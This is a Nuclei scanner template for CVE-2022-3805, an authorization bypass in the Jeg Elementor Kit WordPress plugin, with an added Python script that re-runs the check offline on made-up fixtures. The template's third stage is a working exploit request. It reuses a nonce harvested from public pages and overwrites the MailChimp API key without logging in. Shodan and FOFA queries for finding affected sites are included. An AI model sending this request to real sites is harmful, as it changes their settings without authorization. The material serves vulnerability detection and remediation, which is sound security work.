id: CVE-2022-3805

info:
  name: Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update
  author: DhiyaneshDk,popcorn94
  severity: high
  description: |
    The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in various functions used to update the plugin settings in versions up to, and including, 2.5.6. Unauthenticated users can use an easily available nonce, obtained from pages edited by the plugin, to update the MailChimp API key, global styles, 404 page settings, and enabled elements. The nonce is embedded in the HTML the plugin renders, and the affected AJAX handlers verify only that nonce, not the caller's capabilities.
  impact: |
    Unauthenticated attackers can exploit the authorization bypass using easily obtained nonces to update plugin settings including MailChimp API keys, global styles, and 404 page configurations, potentially compromising site integrations and design.
  remediation: Fixed in 2.5.7. Update the plugin to version 2.5.7 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3805
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit/jeg-elementor-kit-256-unauthenticated-authorization-bypass
    - https://wordpress.org/plugins/jeg-elementor-kit/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9955d65-afb3-4d28-abd2-9f2fec92d013
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 8.6
    cve-id: CVE-2022-3805
    # Missing authorization on the settings-update handlers (not XSS).
    cwe-id: CWE-862
    epss-score: 0.08483
    epss-percentile: 0.92575
    cpe: cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: jegtheme
    product: jeg_elementor_kit
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/jeg-elementor-kit"
    fofa-query: body="/wp-content/plugins/jeg-elementor-kit/"
    publicwww-query: "/wp-content/plugins/jeg-elementor-kit/"
  tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive,vuln

variables:
  # Random marker written into the MailChimp API key field; the template is
  # intrusive because a successful run changes the site's stored settings.
  rand: "{{rand_text_numeric(5)}}"

# Each stage runs only if the previous stage's internal matcher passed.
flow: http(1) && http(2) && http(3)

http:
  # Stage 1: confirm the plugin is installed and its Stable tag is below 2.5.7.
  - raw:
      - |
        GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "< 2.5.7")'
          - 'contains(body, "Jeg Elementor Kit")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"
        internal: true

  # Stage 2: harvest the AJAX nonce and endpoint the plugin prints into the
  # front page for every visitor, authenticated or not.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "jeg-elementor-kit")
          - contains(content_type, "text/html")
        condition: and
        internal: true

    extractors:
      - type: regex
        group: 1
        name: nonce
        regex:
          - 'jkit_nonce = "([a-zA-Z0-9]{10})"'
        internal: true

      - type: regex
        group: 1
        name: url
        regex:
          - 'jkit_ajax_url = "(http[s]?://[^"]+)"'
        internal: true

  # Stage 3: replay the harvested nonce to the settings-update handler with
  # no session cookie; a "Success Save Data" JSON reply confirms the bypass.
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jkit-ajax-request=jkit_elements&form_data[mailchimp_api_key]={{rand}}&action=save_user_data&nonce={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "Success Save Data")
          - contains(content_type, "application/json")
        condition: and
# digest: 4a0a004730450221008031b08a6252cbdc8ec6754528844e77f3ffe67f20439c1a2dd3e31f33b46ef4022050ff9a63d6286b966a84ecf1f9707825f9b7350d092c101f5a7b4693eceb8ce7:922c64590222798bb761d5b6d8e72950
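The template chains three checks: a version gate on readme.txt, extraction of the nonce and AJAX URL the plugin leaks into public HTML, and a settings-update POST whose success proves the handler checks the nonce but not the caller's capability. The Python below is an added example, not part of the Nuclei template or of the plugin: it re-implements each stage's matching logic on constructed fixtures (the readme contents, the homepage HTML, the host example.test and the nonce value are all made up) and drives them through a fake endpoint, so the short-circuit flow and the success matcher can be verified offline without touching a live site. One deliberate difference from the template: the POST is addressed to the extracted jkit_ajax_url rather than to `/`, while the form parameters are the same.

```python
"""Offline re-implementation of the three stages of the CVE-2022-3805 template.

Added example, not the template's or the plugin's own code. All inputs are
constructed fixtures; ``fake_send`` stands in for the network so nothing is sent.
"""
import re
from urllib.parse import urlencode

FIXED_VERSION = (2, 5, 7)

# Same patterns as the template's extractors.
STABLE_TAG_RE = re.compile(r"(?mi)Stable tag: ([0-9.]+)")
NONCE_RE = re.compile(r'jkit_nonce = "([a-zA-Z0-9]{10})"')
AJAX_URL_RE = re.compile(r'jkit_ajax_url = "(https?://[^"]+)"')

# Constructed fixtures (not captured from a real site).
README_VULN = "=== Jeg Elementor Kit ===\nContributors: jegtheme\nStable tag: 2.5.6\n"
README_FIXED = "=== Jeg Elementor Kit ===\nContributors: jegtheme\nStable tag: 2.5.7\n"
HOMEPAGE = """<html><head>
<script id="jeg-elementor-kit-js-extra">
var jkit_ajax_url = "https://example.test/?jkit-ajax-request=jkit_elements";
var jkit_nonce = "a1b2c3d4e5";
</script></head><body class="jeg-elementor-kit"></body></html>"""


def parse_version(s):
    """'2.5.6' -> (2, 5, 6); tuple comparison gives the same order as compare_versions."""
    return tuple(int(p) for p in s.strip().strip(".").split("."))


def readme_is_vulnerable(readme):
    """Stage 1 matcher: plugin present and Stable tag < 2.5.7. None = plugin not identified."""
    if "Jeg Elementor Kit" not in readme:
        return None
    m = STABLE_TAG_RE.search(readme)
    if not m:
        return None
    return parse_version(m.group(1)) < FIXED_VERSION


def extract_nonce_and_url(html):
    """Stage 2 extractors: the nonce and endpoint the plugin prints for every visitor."""
    n = NONCE_RE.search(html)
    u = AJAX_URL_RE.search(html)
    if not (n and u):
        return None
    return n.group(1), u.group(1)


def build_settings_update(nonce, marker):
    """Stage 3 request body with the same parameters as the template's POST."""
    return urlencode({
        "jkit-ajax-request": "jkit_elements",
        "form_data[mailchimp_api_key]": marker,
        "action": "save_user_data",
        "nonce": nonce,
    }, safe="[]")  # keep the PHP array brackets literal, as the template does


def response_confirms_update(status, content_type, body):
    """Stage 3 matcher: 200, JSON, and the handler's success message."""
    return (status == 200
            and "application/json" in content_type
            and "Success Save Data" in body)


def fake_send(ajax_url, body):
    """Stand-in for the vulnerable endpoint: it validates the nonce format only,
    never a capability, which is exactly the authorization gap being tested."""
    if not re.search(r"(?:^|&)nonce=[a-zA-Z0-9]{10}(?:&|$)", body):
        return 403, "application/json", '{"message":"Invalid nonce"}'
    return 200, "application/json; charset=UTF-8", '{"message":"Success Save Data"}'


def template_flow(readme, html, send=fake_send):
    """Mirror ``flow: http(1) && http(2) && http(3)``: each stage only runs if the
    previous one's internal matcher passed. ``send`` performs the POST and
    returns (status, content_type, body)."""
    if not readme_is_vulnerable(readme):
        return "not vulnerable: plugin absent or version >= 2.5.7"
    found = extract_nonce_and_url(html)
    if not found:
        return "inconclusive: nonce or ajax url not exposed on the front page"
    nonce, ajax_url = found
    status, ct, body = send(ajax_url, build_settings_update(nonce, "12345"))
    if response_confirms_update(status, ct, body):
        return "vulnerable: settings updated with a harvested nonce and no session"
    return "inconclusive: endpoint did not confirm the update"


if __name__ == "__main__":
    print(template_flow(README_VULN, HOMEPAGE))
    print(template_flow(README_FIXED, HOMEPAGE))
```

The point the fake endpoint makes is the general one behind this CVE: a WordPress nonce only shows that the request came from a page the site itself served, and the plugin prints it for anonymous visitors, so `check_ajax_referer()` alone cannot substitute for a `current_user_can()` capability check in a handler registered on a `wp_ajax_nopriv_` hook.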